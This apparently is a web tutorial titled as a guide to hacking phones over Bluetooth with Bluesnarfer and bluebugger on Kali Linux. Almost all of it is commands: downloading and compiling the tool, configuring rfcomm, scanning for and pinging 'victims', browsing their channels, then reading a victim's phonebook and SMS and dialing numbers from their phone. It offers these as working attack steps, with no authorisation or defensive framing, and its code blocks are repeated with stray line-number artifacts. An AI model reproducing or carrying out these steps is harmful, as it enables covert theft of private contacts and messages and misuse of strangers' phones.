(Kali Linux Tutorial) How To Hack Phones With Bluetooth!

A brief tutorial on how to hack a phone via bluetooth using Bluesnarfer. For Backtrack/Kali Linux : First we must install Bluesnarfer Make your way to the opt directory

Code:

cd /opt

cd /opt

Also Read: How To Hack Bluetooth And Other Wireless Tools Using Kali Linux

Get Bluesnarfer using the wget command

Code:

/opt# wget http://alighieri.org/tools/bluesnarfer.tar.gz

1	/opt# wget http://alighieri.org/tools/bluesnarfer.tar.gz

Reopen the directory using the ls command and you will see Bluesnarfer in there, now we have to extract it.

Code:

:/opt# ls
bluesnarfer.tar.gz  firmware-mod-kit  metasploit  Teeth

1 2	:/opt# ls bluesnarfer.tar.gz firmware-mod-kit metasploit Teeth

To extract we use the simple tar xvf command

Code:

/opt# tar xvf bluesnarfer.tar.gz

1	/opt# tar xvf bluesnarfer.tar.gz

Reopen the directory once again and you will see Bluesnarfer there

Code:

/opt# ls
BFi13-dev-18  bluesnarfer.tar.gz  metasploit
bluesnarfer   firmware-mod-kit    Teeth

/opt# ls

BFi13-dev-18 bluesnarfer.tar.gz metasploit

bluesnarfer firmware-mod-kit Teeth

Lets enter that folder like so

Code:

/opt# cd bluesnarfer

1	/opt# cd bluesnarfer

Code:

/opt/bluesnarfer# ls
include  Makefile  README  src

1 2	/opt/bluesnarfer# ls include Makefile README src

Now we finish it off by compoling the install like this

Code:

/opt/bluesnarfer# make

1	/opt/bluesnarfer# make

To see all of the Bluesnarfer commands run this command ./bluesnarfer

Code:

:/opt/bluesnarfer# ./bluesnarfer

1	:/opt/bluesnarfer# ./bluesnarfer

Now that we have Bluesnarfer, you must configure rfcomm first, if you havent already done that,

Code:

mkdir -p /dev/bluetooth/rfcomm

1	mkdir -p /dev/bluetooth/rfcomm

Code:

mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0

1	mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0

Code:

mknod --mode=666 /dev/rfcomm0 c 216 0

1	mknod --mode=666 /dev/rfcomm0 c 216 0

Code:

hciconfig -i hci0 up

1	hciconfig -i hci0 up

Code:

hciconfig hci0

1	hciconfig hci0

(Scan for victims)

Code:

hcitool scan hci0

1	hcitool scan hci0

(ping the vitcim to see if he is awake)

Code:

l2ping  &lt; victim mac addr&gt;

1	l2ping < victim mac addr>

(browse the victim for rfcomm channels to connect to)

Code:

sdptool browse --tree --l2cap &lt; mac addr &gt;

1	sdptool browse --tree --l2cap < mac addr >

(then you can use bluesnarfer for example to read the victims phonebook, dial a number or read Sms or other things.)

Code:

Bluesnarfer -r 1-100 -C 7 -b &lt; mac addr &gt;

1	Bluesnarfer -r 1-100 -C 7 -b < mac addr >

(to see available opions to do )

Code:

bluebugger -h

1	bluebugger -h

(Dial number )

Code:

bluebugger -m &lt; victim name &gt; -c 7 -a &lt; mac addr &gt; Dial &lt; number &gt;

1	bluebugger -m < victim name > -c 7 -a < mac addr > Dial < number >

Extra: This is what the Bluesnarfer shell should look like

Code:

bluesnarfer, version 0.1 –
usage: bluesnarfer [options] [ATCMD] -b bt_addrATCMD     : valid AT+CMD (GSM EXTENSION)TYPE      : valid phonebook type ..
example   : “DC” (dialed call list)
“SM” (SIM phonebook)
“RC” (recevied call list)
“XX” much more-b bdaddr : bluetooth device address
-C chan   : bluetooth rfcomm channel-c ATCMD  : custom action
-r N-M    : read phonebook entry N to M
-w N-M    : delete phonebook entry N to M
-f name   : search “name” in phonebook address
-s TYPE   : select phonebook memory storage
-l      : list aviable phonebook memory storage
-i      : device info